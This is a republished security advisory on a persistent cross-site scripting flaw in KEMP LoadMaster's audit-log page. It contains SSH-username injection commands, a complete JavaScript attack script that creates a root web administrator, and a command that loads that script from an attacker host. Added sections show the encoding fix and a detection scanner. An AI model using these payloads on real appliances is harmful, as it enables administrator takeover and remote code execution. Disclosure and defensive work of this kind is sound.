KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Ex
Source: http://www.securiteam.com/ Author: SecuriTeam Published: 2017-05-31
Vulnerability Summary
 
KEMP's main product, the LoadMaster, is a load balancer built on its own proprietary software platform, LMOS, which lets it run on almost any platform: as a KEMP LoadMaster hardware appliance, or as a Virtual LoadMaster (VLM) deployed on Hyper-V, VMware, bare metal or in the public cloud. KEMP is available in Azure, where it is among the top 15 deployed applications, as well as in AWS and VMware vCloud Air.
 
A persistent cross-site scripting vulnerability has been discovered in KEMP LoadMaster v7.135.0.13245 (latest at the time of writing). An unauthenticated attacker can inject JavaScript into the appliance's audit log; when an administrator views that log, the script runs in the administrator's browser session and uses it to create a new web administrator user.
 
Vendor response
 
We were unable to get an update beyond this statement from the vendor: "Expect a fix in our new version available Jan 2017."
 
Vulnerability Details
 
The issue is located in the System Configuration > System Log Files > View Audit LogFile page. A failed SSH login is written to the audit log together with the user name that was supplied, and the page renders the log without encoding it, so HTML or JavaScript placed in the SSH user name executes in the browser of any administrator who views the log. The injected script can then submit requests with the administrator's session, for example to create a new user with full permissions.
Once administrative access is obtained, the attacker can use it to execute arbitrary code.
 
Proof of Concept (PoC):
 
1 – On the victim appliance, check the Audit LogFile (System Configuration > System Log Files): it is empty (Image 2)
 
2 – Inject simple HTML/JS into the log through the SSH user name. From an attacker machine, open a shell and run the following (the shell escaping keeps the markup intact as a single user name):
 
ssh \<button\ onclick\=alert\(1\)\>Click\ <\/button\>@10.0.8.145
 
3 – Let the login fail by entering a wrong password (Image 4)
 
4 – Check the log page again (View Audit LogFile): the HTML/JS has been injected and rendered as live markup (Image 5)
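To make the root cause concrete, here is an added example (not KEMP code, and not part of the original advisory) that models the audit-log view in two ways: rendering the log text straight into the page, which is the behaviour the PoC above demonstrates, and rendering it with HTML encoding, which is the fix. The log-line format is constructed in OpenSSH's style; the advisory does not show the real LMOS audit log format.

```javascript
// Constructed audit-log lines. The second line carries the same payload the
// PoC injects through the SSH user name. The format is an assumption.
const AUDIT_LOG = [
  "May 31 10:14:02 sshd[2231]: Failed password for bal from 10.0.8.130 port 51234 ssh2",
  "May 31 10:15:40 sshd[2240]: Invalid user <button onclick=alert(1)>Click </button> from 10.0.8.130",
  "May 31 10:16:05 sshd[2251]: Invalid user admin from 10.0.8.131",
];

// Vulnerable rendering: log text is concatenated into the page's HTML, so the
// markup an attacker placed in the SSH user name becomes live DOM when an
// administrator opens the View Audit LogFile page.
function renderAuditLogUnsafe(lines) {
  return "<pre>" + lines.join("\n") + "</pre>";
}

// Fixed rendering: every HTML metacharacter is encoded before insertion, so
// the same bytes are displayed as text and never execute.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderAuditLogSafe(lines) {
  return "<pre>" + lines.map(escapeHtml).join("\n") + "</pre>";
}

// Check whether rendered output contains any tag other than the <pre> wrapper;
// true for the unsafe renderer with the payload above, false for the safe one.
function containsForeignTags(html) {
  const inner = html.slice("<pre>".length, -"</pre>".length);
  return /<[a-z!\/]/i.test(inner);
}
```

The encoding function is the whole fix: output encoding at the point where untrusted log data meets HTML. Input filtering at the SSH daemon would not help, because any logged field (user name, client version string) is attacker-controlled.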
 
Attack script:
 
1 – Start a web server on the attacker machine and host the following JS file (kemp_attack.js)
 
//BEGIN////////////////////////////////////////////////////////
// Build a hidden form, fill it with the given fields and submit it. Because this
// runs in the administrator's authenticated browser, the appliance treats the
// resulting requests as the administrator's own.
openl = function(verb, url, data, target) {
  var form = document.createElement("form");
  form.action = url;
  form.method = verb;
  form.target = target || "_self";
  if (data) {
    for (var key in data) {
      var input = document.createElement("textarea");
      input.name = key;
      input.value = typeof data[key] === "object" ? JSON.stringify(data[key]) : data[key];
      form.appendChild(input);
    }
  }
  form.style.display = 'none';
  document.body.appendChild(form);
  form.submit();
};

// Step 1: create the user. Modify the target IP (10.0.8.145) and user/pass as necessary.
openl('POST', 'https://10.0.8.145/progs/useradmin/add', {user:'Peru', pass:'GoSecure!', s:'Add+User'}, 'newWindow');

// Step 2: give the new user full (root) permissions. xuser must be equal to user.
// Increase the timeout (250) for debugging.
setTimeout(function(){
  openl('POST', 'https://10.0.8.145/progs/useradmin/setopts', {xuser:'Peru', root:'1'}, 'newWindow');
}, 250);

// Step 3: load the appliance home page in the same window (an empty method means GET).
// Modify the target IP as necessary. The timeout must be greater than the previous one.
setTimeout(function(){
  openl('', 'https://10.0.8.145/', '', 'newWindow');
}, 500);
//////////////////////////////////////////////////////////END//
 
2 – Verify the permissions of kemp_attack.js so the web server can serve it (chmod 644 kemp_attack.js)
 
3 – Check the users currently enabled in the KEMP LoadMaster under System Configuration > User Management. As you can see, no user apart from the default one is active on the appliance (Image 8)
 
4 – Inject the attack code: from the attacker machine, open a shell and run the following (the ':' after "http" is written as the HTML entity &#x3A; so that the user name survives SSH's handling of the string):
 
ssh \<script \ src\=\"http\&\#x3A\;\/\/10\.0\.8\.130\/kemp\_attack\.js\"\>\ </script>@10.0.8.145
 
5 – Open the log page again (View Audit LogFile): viewing it triggers the injected script tag, which loads kemp_attack.js from the attacker's web server and runs it in the administrator's session
 
6 – Check the User Management page again: a new user has been created with all permissions.
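For the defensive side of the same chain, here is an added example (not KEMP's code, and not part of the original advisory) of detection logic that scans SSH authentication log lines for markup planted in the user-name field, the injection vector both procedures above rely on. The sample lines are constructed in OpenSSH's "Invalid user" style, which is an assumption about the appliance's log format; the two injected user names are the exact payloads from the advisory.

```javascript
// Constructed sample lines (OpenSSH style, assumed); lines 2 and 4 carry the
// advisory's two payloads.
const SAMPLE_LINES = [
  "May 31 10:14:02 lb sshd[2231]: Invalid user backup from 10.0.8.200 port 40110",
  "May 31 10:15:40 lb sshd[2240]: Invalid user <button onclick=alert(1)>Click </button> from 10.0.8.130 port 51234",
  "May 31 10:16:05 lb sshd[2251]: Invalid user admin from 10.0.8.131 port 40222",
  'May 31 10:17:18 lb sshd[2262]: Invalid user <script src="http&#x3A;//10.0.8.130/kemp_attack.js"> </script> from 10.0.8.130 port 51300',
];

// Decode numeric and the common named HTML entities first, so an attacker
// cannot hide "http://" from the matcher by writing "http&#x3A;//", exactly
// as the second injection above does.
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&quot;/g, '"')
    .replace(/&amp;/g, "&");
}

// Greedy user-name capture up to the final " from <ip>", since the injected
// name may itself contain spaces and the word "from".
const USER_RE = /Invalid user (.*) from (\d{1,3}(?:\.\d{1,3}){3})/;

// A tag opener, an inline event handler, a javascript: URL or an http(s) URL
// has no business in a user name.
const MARKUP_RE = /<\s*\/?[a-z]|on[a-z]+\s*=|javascript:|https?:\/\//i;

// Returns one finding per line whose user-name field carries markup. The
// decoded name and source IP are kept so the event can be correlated with a
// later unexpected user-management change on the appliance.
function findInjectedUsernames(lines) {
  const findings = [];
  for (const line of lines) {
    const m = USER_RE.exec(line);
    if (!m) continue;
    const user = decodeEntities(m[1]);
    if (MARKUP_RE.test(user)) {
      findings.push({ user: user, source: m[2], line: line });
    }
  }
  return findings;
}
```

A finding from this scan followed shortly by a user added or elevated through /progs/useradmin is the sequence the attack script produces, so the two signals are worth correlating rather than alerting on the log entry alone.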
 